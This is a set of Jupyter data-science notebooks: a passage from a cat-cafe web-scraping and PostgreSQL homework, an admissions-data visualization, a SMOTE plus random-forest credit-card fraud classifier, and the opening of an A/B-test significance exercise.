location_ar.append(str(location.text)) pattern = tr_tag.find('td', {'class':'pattern'}) if pattern: pattern = str(pattern.text) weight = tr_tag.find('td', {'class':'weight'}) if weight: weight = weight.text name = tr_tag.find('td', {'class': 'name'}) if name: name = str(name.text) # print(name) cat_dict = {'birthdate': birthdate, 'color':color, 'pattern':pattern,'locations':location_ar, 'weight':weight,'name':name} cafe_list.append(cafe_dict) # print(tr_tag) # your code here cat_list.append(cat_dict) cat_list ###Output _____no_output_____ ###Markdown Problem set 2: Designing the schemaBefore you do anything else, use `psql` to create a new database for this homework assignment using the following command: CREATE DATABASE catcafes; In the following cell, connect to the database using `pg8000`. (You may need to provide additional arguments to the `.connect()` method, depending on the distribution of PostgreSQL you're using.) ###Code import pg8000 conn = pg8000.connect(database="catcafes") ###Output _____no_output_____ ###Markdown Here's a cell you can run if something goes wrong and you need to rollback the current query session: ###Code conn.rollback() ###Output _____no_output_____ ###Markdown In the cell below, you're going to create *three* tables, necessary to represent the data you scraped above. I've given the basic framework of the Python code and SQL statements to create these tables. I've given the entire `CREATE TABLE` statement for the `cafe` table, but for the other two, you'll need to supply the field names and the data types for each column. If you're unsure what to call the fields, or what fields should be in the tables, consult the queries in "The Queries" below. Hints:* Many of these fields will be `varchar`s. Don't worry too much about how many characters you need—it's okay just to eyeball it.* Feel free to use a `varchar` type to store the `birthdate` field. No need to dig too deep into PostgreSQL's date types for this particular homework assignment.* Cats and locations are in a *many-to-many* relationship. You'll need to create a linking table to represent this relationship. 
(That's why there's space for you to create *three* tables.)* The linking table will need a field to keep track of whether or not a particular cafe is the "current" cafe for a given cat. ###Code cursor = conn.cursor() #cursor.execute("""CREATE TABLE cafe (id serial,name varchar(40),zip varchar(5))""") #cursor.execute("""CREATE TABLE cat (birthdate varchar(20),color varchar(20),name varchar(20),pattern varchar(20),weight varchar(20),id serial)""") #cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer)""") #conn.commit() cursor = conn.cursor() cursor.execute("""CREATE TABLE cafe (id serial,name varchar(40),zip varchar(5))""") conn.commit() cursor.execute("""CREATE TABLE cat (birthdate varchar(20),color varchar(20),name varchar(20),pattern varchar(20),weight float,id serial)""") conn.commit() conn.rollback() cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer, active boolean)""") conn.commit() ###Output _____no_output_____ ###Markdown After executing the above cell, issuing a `\d` command in `psql` should yield something that looks like the following:``` List of relations Schema | Name | Type | Owner --------+-------------+----------+--------- public | cafe | table | allison public | cafe_id_seq | sequence | allison public | cat | table | allison public | cat_cafe | table | allison public | cat_id_seq | sequence | allison(5 rows)```If something doesn't look right, you can always use the `DROP TABLE` command to drop the tables and start again. (You can also issue a `DROP DATABASE catcafes` command to drop the database altogether.) Don't worry if it takes a few tries to get it right—happens to the best and most expert among us. You'll probably have to drop the database and start again from scratch several times while completing this homework.> Note: If you try to issue a `DROP TABLE` or `DROP DATABASE` command and `psql` seems to hang forever, it could be that PostgreSQL is waiting for current connections to close before proceeding with your command. To fix this, create a cell with the code `conn.close()` in your notebook and execute it. After the `DROP` commands have completed, make sure to run the cell containing the `pg8000.connect()` call again. Problem set 3: Inserting the dataIn the cell below, I've written the code to insert the cafes into the `cafe` table, using data from the `cafe_list` variable that we made earlier. If the code you wrote to create that table was correct, the following cell should execute without error or incident. Execute it before you continue. ###Code conn.rollback() cafe_name_id_map = {} for item in cafe_list: cursor.execute("INSERT INTO cafe (name, zip) VALUES (%s, %s) RETURNING id", [str(item['name']), str(item['zip'])]) #print(item) rowid = cursor.fetchone()[0] cafe_name_id_map[str(item['name'])] = rowid #print(rowid) # print(cafe_name_id_map[str(item['name'])]) conn.commit() ###Output _____no_output_____ ###Markdown Issuing `SELECT * FROM cafe` in the `psql` client should yield something that looks like this:``` id | name | zip ----+-------------------+------- 1 | Hang In There | 11237 2 | Independent Claws | 11201 3 | Paws and Play | 11215 4 | Tall Tails | 11222 5 | Cats Meow | 11231(5 rows)```(The `id` values may be different depending on how many times you've cleaned the table out with `DELETE`.)Note that the code in the cell above created a dictionary called `cafe_name_id_map`. What's in it? 
Let's see: ###Code cafe_name_id_map print(type(cafe_name_id_map)) ###Output <class 'dict'> ###Markdown The dictionary maps the *name of the cat cafe to its ID in the database*. You'll need these values later when you're adding records to the linking table (`cat_cafe`).Now the tricky part. (Yes, believe it or not, *this* is the tricky part. The other stuff has all been easy by comparison.) In the cell below, write the Python code to insert each cat's data from the `cat_list` variable (created in Problem Set 1) into the `cat` table. The code should *also* insert the relevant data into the `cat_cafe` table. Hints:* You'll need to get the `id` of each cat record using the `RETURNING` clause of the `INSERT` statement and the `.fetchone()` method of the cursor object.* How do you know whether or not the current location is the "active" location for a particular cat? The page itself contains some explanatory text that might be helpful here. You might need to use some string checking and manipulation functions in order to make this determination and transform the string as needed.* The linking table stores an ID only for both the cat and the cafe. Use the `cafe_name_id_map` dictionary to get the `id` of the cafes inserted earlier. ###Code #conn.rollback() #cursor.execute("SELECT 'Cats Meow' from cafe RETURNING id") #rowid = cursor.fetchone()[0] #print(rowid) print(cat_list) conn.rollback() cat_name_id_map = {} for cat in cat_list: #pass # replace pass with your code. it will be a LOT of code! cursor.execute("INSERT INTO cat(name, birthdate, weight, color, pattern) VALUES (%s, %s, %s, %s, %s) RETURNING id", [str(cat['name']), str(cat['birthdate']), str(cat['weight']), str(cat['color']), str(cat['pattern'])]) cat_rowid = cursor.fetchone()[0] import re # print(type(cat['location'])) # cat['locations'] = {} new_list = cat['locations'][0].split(",") # print(new_list) #print(cat['locations']) # print("After split", cat['locations']) for location in new_list: #print(type(location)) # print(location) match = re.search(r"\*$", location) # print(match) print(cat_rowid) location = location.strip("*") # print(location) location = location.strip() location_int = cafe_name_id_map.get(location) if match: print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid)+ " True") cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)", [location_int, cat_rowid, True]) else: print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid) + " False") cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)", [location_int, cat_rowid, False]) #cat_name_id_map[str(cat['name'])] = rowid #print(cat_name_id_map) #for cat in cat_name_id_map: conn.commit() ###Output 1 INSERT INTO cat_cafe(3 1 False 1 INSERT INTO cat_cafe(2 1 True 2 INSERT INTO cat_cafe(2 2 True 3 INSERT INTO cat_cafe(2 3 True 4 INSERT INTO cat_cafe(4 4 True 4 INSERT INTO cat_cafe(1 4 False 5 INSERT INTO cat_cafe(3 5 True 6 INSERT INTO cat_cafe(1 6 True 7 INSERT INTO cat_cafe(1 7 True 7 INSERT INTO cat_cafe(45 7 False 7 INSERT INTO cat_cafe(4 7 False 8 INSERT INTO cat_cafe(3 8 True 8 INSERT INTO cat_cafe(45 8 False 9 INSERT INTO cat_cafe(2 9 False 9 INSERT INTO cat_cafe(3 9 True 10 INSERT INTO cat_cafe(2 10 True 10 INSERT INTO cat_cafe(1 10 False 11 INSERT INTO cat_cafe(2 11 False 11 INSERT INTO cat_cafe(45 11 True 11 INSERT INTO cat_cafe(3 11 False 12 INSERT INTO cat_cafe(2 12 False 12 INSERT INTO cat_cafe(3 12 True 13 INSERT INTO cat_cafe(1 13 False 13 INSERT INTO cat_cafe(4 13 True 14 
INSERT INTO cat_cafe(1 14 True 15 INSERT INTO cat_cafe(2 15 True 15 INSERT INTO cat_cafe(3 15 False 16 INSERT INTO cat_cafe(4 16 True 17 INSERT INTO cat_cafe(3 17 True 18 INSERT INTO cat_cafe(3 18 True 18 INSERT INTO cat_cafe(4 18 False 19 INSERT INTO cat_cafe(1 19 False 19 INSERT INTO cat_cafe(2 19 True 20 INSERT INTO cat_cafe(45 20 False 20 INSERT INTO cat_cafe(2 20 True 20 INSERT INTO cat_cafe(4 20 False 21 INSERT INTO cat_cafe(2 21 True 22 INSERT INTO cat_cafe(1 22 True 22 INSERT INTO cat_cafe(4 22 False 23 INSERT INTO cat_cafe(3 23 True 23 INSERT INTO cat_cafe(2 23 False 23 INSERT INTO cat_cafe(4 23 False 24 INSERT INTO cat_cafe(4 24 True 25 INSERT INTO cat_cafe(4 25 False 25 INSERT INTO cat_cafe(1 25 False 25 INSERT INTO cat_cafe(45 25 True 26 INSERT INTO cat_cafe(45 26 False 26 INSERT INTO cat_cafe(3 26 False 26 INSERT INTO cat_cafe(4 26 True 27 INSERT INTO cat_cafe(1 27 False 27 INSERT INTO cat_cafe(2 27 False 27 INSERT INTO cat_cafe(45 27 True 28 INSERT INTO cat_cafe(3 28 True 29 INSERT INTO cat_cafe(45 29 False 29 INSERT INTO cat_cafe(1 29 False 29 INSERT INTO cat_cafe(2 29 True 30 INSERT INTO cat_cafe(3 30 True 31 INSERT INTO cat_cafe(2 31 True 32 INSERT INTO cat_cafe(4 32 True 33 INSERT INTO cat_cafe(2 33 False 33 INSERT INTO cat_cafe(45 33 False 33 INSERT INTO cat_cafe(1 33 True 34 INSERT INTO cat_cafe(4 34 False 34 INSERT INTO cat_cafe(2 34 False 34 INSERT INTO cat_cafe(1 34 True 35 INSERT INTO cat_cafe(2 35 False 35 INSERT INTO cat_cafe(3 35 True 36 INSERT INTO cat_cafe(1 36 True 36 INSERT INTO cat_cafe(2 36 False 37 INSERT INTO cat_cafe(3 37 True 37 INSERT INTO cat_cafe(45 37 False 38 INSERT INTO cat_cafe(4 38 True 39 INSERT INTO cat_cafe(1 39 False 39 INSERT INTO cat_cafe(4 39 False 39 INSERT INTO cat_cafe(2 39 True 40 INSERT INTO cat_cafe(45 40 True 40 INSERT INTO cat_cafe(2 40 False 40 INSERT INTO cat_cafe(4 40 False ###Markdown Issuing a `SELECT * FROM cat LIMIT 10` in `psql` should yield something that looks like this:``` id | name | birthdate | weight | color | pattern ----+-----------+------------+--------+----------+--------------- 1 | Sylvester | 2015-05-20 | 10.46 | black | colorpoint 2 | Jasper | 2000-01-03 | 8.06 | cinnamon | solid 3 | Luna | 2006-02-27 | 10.88 | brown | tortoiseshell 4 | Georges | 2015-08-13 | 9.40 | white | tabby 5 | Millie | 2003-09-13 | 9.27 | red | bicolor 6 | Lisa | 2009-07-30 | 8.84 | cream | colorpoint 7 | Oscar | 2011-12-15 | 8.44 | cream | solid 8 | Scaredy | 2015-12-30 | 8.83 | lilac | tabby 9 | Charlotte | 2013-10-16 | 9.54 | blue | tabby 10 | Whiskers | 2011-02-07 | 9.47 | white | colorpoint(10 rows)```And a `SELECT * FROM cat_cafe LIMIT 10` in `psql` should look like this:``` cat_id | cafe_id | active --------+---------+-------- 1 | 3 | f 1 | 2 | t 2 | 2 | t 3 | 2 | t 4 | 4 | t 4 | 1 | f 5 | 3 | t 6 | 1 | t 7 | 1 | t 7 | 5 | f(10 rows)```Again, the exact values for the ID columns might be different, depending on how many times you've deleted and dropped the tables. The QueriesOkay. To verify your work, run the following queries and check their output. If you've correctly scraped the data and imported it into SQL, running the cells should produce exactly the expected output, as indicated. If not, then you performed one of the steps above incorrectly; check your work and try again. (Note: Don't modify these cells, just run them! This homework was about *scraping* and *inserting* data, not querying it.) 
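Before checking them, a quick row-count sanity check (my addition, not one of the assigned queries) can confirm the inserts landed: ###Code
conn.rollback()
cursor.execute("SELECT count(*) FROM cat")
print("cats:", cursor.fetchone()[0])           # should equal len(cat_list)
cursor.execute("SELECT count(*) FROM cat_cafe")
print("cat_cafe rows:", cursor.fetchone()[0])  # one row per cat/cafe pairing
###Output _____no_output_____ ###Markdown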
What's the name of the youngest cat at any location?Expected output: `Scaredy` ###Code cursor.execute("SELECT max(birthdate) FROM cat") birthdate = cursor.fetchone()[0] cursor.execute("SELECT name FROM cat WHERE birthdate = %s", [birthdate]) print(cursor.fetchone()[0]) ###Output Scaredy ###Markdown In which zip codes can I find a lilac-colored tabby?Expected output: 11237, 11215 ###Code conn.rollback() cursor.execute("""SELECT DISTINCT(cafe.zip) FROM cat JOIN cat_cafe ON cat.id = cat_cafe.catid JOIN cafe ON cafe.id = cat_cafe.cafeid WHERE cat.color = 'lilac' AND cat.pattern = 'tabby' AND cat_cafe.active = true """) print(', '.join([x[0] for x in cursor.fetchall()])) ###Output 11237, 11215 ###Markdown What's the average weight of cats currently residing at all locations?Expected output:```Independent Claws: 9.33Paws and Play: 9.28Tall Tails: 9.82Hang In There: 9.25Cats Meow: 9.76``` ###Code conn.rollback() cursor.execute(""" SELECT cafe.name, avg(cat.weight) FROM cat JOIN cat_cafe ON cat.id = cat_cafe.catid JOIN cafe ON cafe.id = cat_cafe.cafeid WHERE cat_cafe.active = True GROUP BY cafe.name """) for rec in cursor.fetchall(): print(rec[0]+":", "%0.2f" % rec[1]) ###Output Hang In There: 9.25 Independent Claws: 9.33 Paws and Play: 9.28 Tall Tails: 9.82 Cats Meow: 9.75 ###Markdown Which location has the most cats with tortoiseshell coats?Expected output: `Independent Claws` ###Code conn.rollback() cursor.execute(""" SELECT cafe.name FROM cat JOIN cat_cafe ON cat.id = cat_cafe.catid JOIN cafe ON cafe.id = cat_cafe.cafeid WHERE cat_cafe.active = true AND cat.pattern = 'tortoiseshell' GROUP BY cafe.name ORDER BY count(cat.name) DESC LIMIT 1 """) print(cursor.fetchone()[0]) ###Output Independent Claws
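###Markdown As a final housekeeping step (my addition), close the cursor and connection so that later `DROP TABLE` or `DROP DATABASE` commands don't hang waiting on open connections, as noted earlier: ###Code
cursor.close()
conn.close()
###Output _____no_output_____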
Data_visualization_seaborn_matplotlin.ipynb
###Markdown Exploratory visualization of the graduate admissions dataset with seaborn and matplotlib. ###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns

# Load the graduate admissions data; keep a working copy in `data`
df = pd.read_csv('Admission_Predict_Ver1.1.csv')
data = df
df.head()

# Scatter plot of GRE Score vs. admission chance, colored by GRE Score
sns.relplot(x='GRE Score', y='Chance of Admit ', hue='GRE Score', data=df);
# Line plot of the same relationship, colored by CGPA
sns.relplot(x='GRE Score', y='Chance of Admit ', hue='CGPA', kind="line", data=df);

# Bucket the admission chance into a binary category
def category(x):
    if x < 0.80:
        return 'less'
    else:
        return 'high'
df['Chance'] = df['Chance of Admit '].apply(category)

# Drop the identifier and the derived label from the numeric working copy
data = data.drop(columns=['Serial No.','Chance'])
data

# Count of high/less admission chances per university rating
sns.countplot(x='Chance', data=df, hue='University Rating')

# Heatmap of the raw feature values (one row per applicant)
sns.heatmap(data)

# Box plots to compare the spread of each numeric feature
data.plot.box()

df['University Rating'].unique()

# Pie chart of the raw admission-chance values (one slice per row)
plt.pie(df['Chance of Admit '], autopct ='% 1.1f %%', shadow = True)
###Output _____no_output_____
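###Markdown The raw-value heatmap above is hard to read because every applicant becomes one heatmap row; a correlation heatmap (a sketch I am adding, not in the original notebook) is usually more informative here: ###Code
# Correlation between the numeric admission features
plt.figure(figsize=(8, 6))
sns.heatmap(data.corr(), annot=True, fmt='.2f', cmap='Blues')
plt.title('Feature correlations')
plt.show()
###Output _____no_output_____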
credit-card-fraud-prediction-rf-smote.ipynb
###Markdown Welcome to my exploration of credit card fraud! In this kernel I will do some exploration to understand the patterns of fraudulent transactions, and then I will implement some machine learning models. I will use an oversampling technique called SMOTE together with supervised learning algorithms. Introduction to Dataset The dataset contains transactions made by credit cards in September 2013 by European cardholders. It presents transactions that occurred over two days, where we have 492 frauds out of 284,807 transactions. The dataset is highly unbalanced: the positive class (frauds) accounts for 0.172% of all transactions. It contains only numerical input variables which are the result of a PCA transformation. Unfortunately, due to confidentiality issues, we cannot provide the original features and more background information about the data. Features V1, V2, ... V28 are the principal components obtained with PCA; the only features which have not been transformed with PCA are 'Time' and 'Amount'. Feature 'Time' contains the seconds elapsed between each transaction and the first transaction in the dataset. The feature 'Amount' is the transaction amount; this feature can be used, for example, for example-dependent cost-sensitive learning. Feature 'Class' is the response variable and it takes value 1 in case of fraud and 0 otherwise. Given the class imbalance ratio, we recommend measuring the accuracy using the Area Under the Precision-Recall Curve (AUPRC). Confusion matrix accuracy is not meaningful for unbalanced classification. The dataset has been collected and analysed during a research collaboration of Worldline and the Machine Learning Group (http://mlg.ulb.ac.be) of ULB (Université Libre de Bruxelles) on big data mining and fraud detection. More details on current and past projects on related topics are available on http://mlg.ulb.ac.be/BruFence and http://mlg.ulb.ac.be/ARTML) Let's start by importing the libraries and looking at the data ###Code
import pandas as pd # To handle the data
import numpy as np # For math operations
import seaborn as sns # For visualization
import matplotlib.pyplot as plt # To plot the graphs
import matplotlib.gridspec as gridspec # To build the grid of plots

# Loading the data
df_credit = pd.read_csv("C:/Users/Lenovo/Desktop/creditcard.csv")
# Looking at how the data looks
df_credit.head()
# Checking the dtypes and searching for null values
df_credit.info()
# The V columns are standardized (PCA outputs); I will explore them later
# For now I will look at the "normal" columns
df_credit[["Time","Amount","Class"]].describe()
###Output _____no_output_____ ###Markdown First, I will explore three different columns:
- Time
- Amount
- Class ###Code
# Let's start by looking at the difference between Normal and Fraud transactions
print("Distribution of Normal(0) and Frauds(1): ")
print(df_credit["Class"].value_counts())

LABELS = ["Normal", "Fraud"]
plt.figure(figsize=(7,5))
sns.countplot(df_credit['Class'])
plt.xticks(range(2), LABELS)
plt.title("Class Count", fontsize=18)
plt.xlabel("Is fraud?", fontsize=15)
plt.ylabel("Count", fontsize=15)
plt.show()
###Output Distribution of Normal(0) and Frauds(1): 
0    284315
1       492
Name: Class, dtype: int64 ###Markdown We clearly have imbalanced data, which is very common when dealing with fraud. First I will explore Time and Amount; second, I will explore the V features, which are PCA components. Time Features and some Feature Engineering As our Time feature is in seconds, we will transform it to minutes and hours to get a better understanding of the patterns ###Code
timedelta = pd.to_timedelta(df_credit['Time'], unit='s')
df_credit['Time_min'] = (timedelta.dt.components.minutes).astype(int)
df_credit['Time_hour'] = (timedelta.dt.components.hours).astype(int)

# Exploring the distribution by class through the hours
plt.figure(figsize=(12,5))
sns.distplot(df_credit[df_credit['Class'] == 0]["Time_hour"], color='g')
sns.distplot(df_credit[df_credit['Class'] == 1]["Time_hour"], color='r')
plt.title('Fraud x Normal Transactions by Hours', fontsize=17)
plt.xlim([-1,25])
plt.show()

# Exploring the distribution by class through the minutes
plt.figure(figsize=(12,5))
sns.distplot(df_credit[df_credit['Class'] == 0]["Time_min"], color='g')
sns.distplot(df_credit[df_credit['Class'] == 1]["Time_min"], color='r')
plt.title('Fraud x Normal Transactions by minutes', fontsize=17)
plt.xlim([-1,61])
plt.show()
###Output _____no_output_____ ###Markdown - Interesting distributions, but they don't suggest a clear pattern of action. Looking at the Amount statistics of fraud and normal transactions ###Code
# Separate the data into frauds and non-frauds
df_fraud = df_credit[df_credit['Class'] == 1]
df_normal = df_credit[df_credit['Class'] == 0]

print("Fraud transaction statistics")
print(df_fraud["Amount"].describe())
print("\nNormal transaction statistics")
print(df_normal["Amount"].describe())
df_fraud.shape
df_normal.shape
###Output _____no_output_____ ###Markdown Interesting. Using this information I will compare Amount by Class, on a log scale as well, so that the heavy right tail of the "normal" amounts (which run into the thousands) doesn't dominate the plot ###Code
# Feature engineering for a better visualization of the values
df_credit['Amount_log'] = np.log(df_credit.Amount + 0.01)

plt.figure(figsize=(14,6))
# Explore Amount by Class and see the distribution of the transaction amounts
plt.subplot(121)
ax = sns.boxplot(x ="Class",y="Amount", data=df_credit)
ax.set_title("Class x Amount", fontsize=20)
ax.set_xlabel("Is Fraud?", fontsize=16)
ax.set_ylabel("Amount(US)", fontsize = 16)

plt.subplot(122)
ax1 = sns.boxplot(x ="Class",y="Amount_log", data=df_credit)
ax1.set_title("Class x Amount", fontsize=20)
ax1.set_xlabel("Is Fraud?", fontsize=16)
ax1.set_ylabel("Amount(Log)", fontsize = 16)

plt.subplots_adjust(hspace = 0.6, top = 0.8)
plt.show()
###Output _____no_output_____ ###Markdown We can see a slight difference in the log Amount of our two classes. 
The IQR of fraudulent transactions is higher than that of normal transactions, but normal transactions reach the highest values Looking at a scatter plot of the Time_min distribution by Amount
###Code
#Looking at the Amount and time distribution of FRAUD transactions
ax = sns.lmplot(y="Amount", x="Time_min", fit_reg=False,aspect=1.8,
                data=df_credit, hue='Class')
plt.title("Amounts by Minutes of Frauds and Normal Transactions",fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
Looking at a scatter plot of the Time_hour distribution by Amount
###Code
ax = sns.lmplot(y="Amount", x="Time_hour", fit_reg=False,aspect=1.8,
                data=df_credit, hue='Class')
plt.title("Amounts by Hour of Frauds and Normal Transactions", fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
I will use distribution plots to search for differing distributions: - We are searching for features where the fraud class diverges from the normal class
###Code
#Looking at the V features
columns = df_credit.iloc[:,1:29].columns

frauds = df_credit.Class == 1
normals = df_credit.Class == 0

grid = gridspec.GridSpec(14, 2)
plt.figure(figsize=(15,20*4))

for n, col in enumerate(df_credit[columns]):
    ax = plt.subplot(grid[n])
    sns.distplot(df_credit[col][frauds], bins = 50, color='g') # fraud transactions in green
    sns.distplot(df_credit[col][normals], bins = 50, color='r') # normal transactions in red
    ax.set_ylabel('Density')
    ax.set_title(str(col))
    ax.set_xlabel('')
plt.show()
###Output
_____no_output_____
###Markdown
We can see interestingly different distributions in some of our features, like V4, V9, V16, V17 and several more. Feature selection
###Code
#I will select the variables where the fraud class shows interesting behavior that might help us predict
df_credit = df_credit[["Time_hour","Time_min","V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount","Class"]]
###Output
_____no_output_____
###Markdown
Some Feature Engineering
###Code
df_credit.Amount = np.log(df_credit.Amount + 0.001)
#Looking at the final df
df_credit.head()
colormap = plt.cm.Greens
plt.figure(figsize=(14,12))
sns.heatmap(df_credit.corr(),linewidths=0.1,vmax=1.0, 
            square=True, cmap = colormap, linecolor='white', annot=True)
plt.show()
###Output
_____no_output_____
###Markdown
Preprocessing
###Code
from imblearn.pipeline import make_pipeline_imb # to chain resampling and modeling in a single step
from imblearn.over_sampling import SMOTE
from sklearn.pipeline import make_pipeline
from imblearn.metrics import classification_report_imbalanced
from sklearn.model_selection import train_test_split
from collections import Counter
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score, fbeta_score, confusion_matrix, precision_recall_curve, accuracy_score

X = df_credit.drop(["Class"], axis=1).values # setting up X for the split
y = df_credit["Class"].values # transforming the values into an array

# the function that we will use to better evaluate the model
def print_results(headline, true_value, pred):
    print(headline)
    print("accuracy: {}".format(accuracy_score(true_value, pred)))
    print("precision: {}".format(precision_score(true_value, pred)))
    print("recall: {}".format(recall_score(true_value, pred)))
    print("f2: {}".format(fbeta_score(true_value, pred, beta=2)))

# splitting data into training and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2, test_size=0.20)

classifier = RandomForestClassifier

# build model with a SMOTE + imblearn pipeline
smote_pipeline = make_pipeline_imb(SMOTE(random_state=4), \
                                   classifier(random_state=42))

smote_model = smote_pipeline.fit(X_train, y_train)
smote_prediction = smote_model.predict(X_test)

#Showing the difference before and after the transformation used
print("normal data distribution: {}".format(Counter(y)))
# note: newer versions of imbalanced-learn call this method fit_resample
X_smote, y_smote = SMOTE().fit_sample(X, y)
print("SMOTE data distribution: {}".format(Counter(y_smote)))
###Output
normal data distribution: Counter({0: 284315, 1: 492})
SMOTE data distribution: Counter({0: 284315, 1: 284315})
###Markdown
Evaluating the model SMOTE + Random Forest
###Code
print("Confusion Matrix: ")
print(confusion_matrix(y_test, smote_prediction))
conf_matrix=confusion_matrix(y_test, smote_prediction)

print('\nSMOTE Pipeline Score {}'.format(smote_pipeline.score(X_test, y_test)))

print_results("\nSMOTE + RandomForest classification", y_test, smote_prediction)
plt.figure(figsize=(10, 10))
sns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt="d");
plt.title("Confusion matrix")
plt.ylabel('True class')
plt.xlabel('Predicted class')
plt.tight_layout()

# Compute predicted probabilities: y_pred_prob
y_pred_prob = smote_pipeline.predict_proba(X_test)[:,1]

# Generate precision recall curve values: precision, recall, thresholds
precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob)

# Plot the precision-recall curve (recall on the x axis, precision on the y axis)
plt.plot(recall, precision)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision Recall Curve')
plt.show()
###Output
_____no_output_____
###Markdown
CONSIDERING ONLY RANDOM FOREST FOR COMPARISON
###Code
# Running the fit
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(max_depth=5, max_features = 7, n_estimators = 10)
rf.fit(X_train, y_train)

# Printing the Training Score
print("Training score data: ")
print(rf.score(X_train, y_train))
#Testing the model
#Predicting by X_test
y_pred = rf.predict(X_test)
print(confusion_matrix(y_test, y_pred))
print_results("RF classification", y_test, y_pred)
###Output
[[56871     7]
 [   16    68]]
RF classification
accuracy: 0.9995962220427653
precision: 0.9066666666666666
recall: 0.8095238095238095
f2: 0.8272506082725061
###Markdown
Feature importance plot
###Code
# the labels must follow the column order of df_credit: Time_hour comes before Time_min
features = ["Time_hour","Time_min","V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount"]
plt.figure(figsize = (9,5))
feat_import = pd.DataFrame({'Feature': features, 'Feature importance': rf.feature_importances_})
feat_import = feat_import.sort_values(by='Feature importance',ascending=False)

g = sns.barplot(x='Feature',y='Feature importance',data=feat_import)
g.set_xticklabels(g.get_xticklabels(),rotation=90)
g.set_title('Features importance - Random Forest',fontsize=20)
plt.show()
###Output
_____no_output_____
###Markdown
The top 4 features (V17, V14, V12, V10) correspond to about 75% of the total importance. Also, the F2 score, a weighted harmonic mean of precision and recall that favors recall, is at a considerable value
###Code
#Predicting probabilities
y_pred_prob = rf.predict_proba(X_test)[:,1]

# Generate precision recall curve values: precision, recall, thresholds
precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob)

# Plot the precision-recall curve (recall on the x axis, precision on the y axis)
plt.plot(recall, precision)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision Recall Curve')
plt.show()
###Output
_____no_output_____
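###Markdown
The dataset description above recommends the Area Under the Precision-Recall Curve (AUPRC) as the headline metric for this problem, so as a closing check, here is a sketch computing it for both models with scikit-learn's average_precision_score (a standard AUPRC estimate); the exact values will depend on the run:
###Code
from sklearn.metrics import average_precision_score

# AUPRC for the SMOTE pipeline and for the plain random forest
auprc_smote = average_precision_score(y_test, smote_pipeline.predict_proba(X_test)[:, 1])
auprc_rf = average_precision_score(y_test, rf.predict_proba(X_test)[:, 1])
print("AUPRC (SMOTE + RF): {:.3f}".format(auprc_smote))
print("AUPRC (RF only): {:.3f}".format(auprc_rf))
###Output
_____no_output_____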
ABTesting/L2_Statistical_Significance_Solution.ipynb
###Markdown
Practice: Statistical SignificanceLet's say that we've collected data for a web-based experiment. In the experiment, we're testing the change in layout of a product information page to see if this affects the proportion of people who click on a button to go to the download page. This experiment has been designed to have a cookie-based diversion, and we record two things from each user: which page version they received, and whether or not they accessed the download page during the data recording period. (We aren't keeping track of any other factors in this example, such as number of pageviews, or time between accessing the page and making the download, that might be of further interest.)Your objective in this notebook is to perform a statistical test on both recorded metrics to see if there is a statistical difference between the two groups.
###Code
# import packages
import numpy as np
import pandas as pd
import scipy.stats as stats
from statsmodels.stats import proportion as proptests

import matplotlib.pyplot as plt
%matplotlib inline

# import data
data = pd.read_csv('data/statistical_significance_data.csv')
data.head(10)
###Output
_____no_output_____
###Markdown
In the dataset, the 'condition' column takes a 0 for the control group, and 1 for the experimental group. The 'click' column takes a value of 0 for no click, and 1 for a click. Checking the Invariant MetricFirst of all, we should check that the number of visitors assigned to each group is similar. It's important to check the invariant metrics as a prerequisite so that our inferences on the evaluation metrics are founded on solid ground. If we find that the two groups are imbalanced on the invariant metric, then this will require us to look carefully at how the visitors were split so that any sources of bias are accounted for. It's possible that a statistically significant difference in an invariant metric will require us to revise random assignment procedures and re-do data collection.In this case, we want to do a two-sided hypothesis test on the proportion of visitors assigned to one of our conditions. Choosing the control or the experimental condition doesn't matter: you'll get the same result either way. Feel free to use whatever method you'd like: we'll highlight two main avenues below.If you want to take a simulation-based approach, you can simulate the number of visitors that would be assigned to each group for the number of total observations, assuming that we have an expected 50/50 split. Do this many times (200 000 repetitions should provide a good speed-variability balance in this case) and then see in how many simulated cases we get as extreme or more extreme a deviation from 50/50 than we actually observed. Don't forget that, since we have a two-sided test, an extreme case also includes values on the opposite side of 50/50. (e.g., since simulated outcomes of .48 and lower are considered at least as extreme as an actual observation of .48, so too are simulated outcomes of .52 and higher.) The proportion of flagged simulation outcomes gives us a p-value on which to assess our observed proportion. We hope to see a larger p-value, insufficient evidence to reject the null hypothesis.If you want to take an analytic approach, you could use the exact binomial distribution to compute a p-value for the test. The more usual approach, however, is to use the normal distribution approximation. Recall that this is possible thanks to our large sample size and the central limit theorem.
To get a precise p-value, you should also perform a continuity correction, either adding or subtracting 0.5 to the total count before computing the area underneath the curve. (e.g. If we had 415 / 850 assigned to the control group, then the normal approximation would take the area to the left of $(415 + 0.5) / 850 = 0.489$ and to the right of $(435 - 0.5) / 850 = 0.511$.)You can check your results by completing the quiz and watching the video following the workspace. You could also try using multiple approaches and seeing if they come up with similar outcomes! Analytic Approach
###Code
# get number of trials and number of 'successes'
n_obs = data.shape[0]
n_control = data.groupby('condition').size()[0]
n_control

# Compute a z-score and p-value
p = 0.5
sd = np.sqrt(p * (1-p) * n_obs)

z = ((n_control + 0.5) - p * n_obs) / sd

print(z)
print(2 * stats.norm.cdf(z))
###Output
-0.506217597735
0.612703902554
###Markdown
Simulation Approach
###Code
# get number of trials and number of 'successes'
n_obs = data.shape[0]
n_control = data.groupby('condition').size()[0]
n_control

# simulate outcomes under null, compare to observed outcome
p = 0.5
n_trials = 200_000

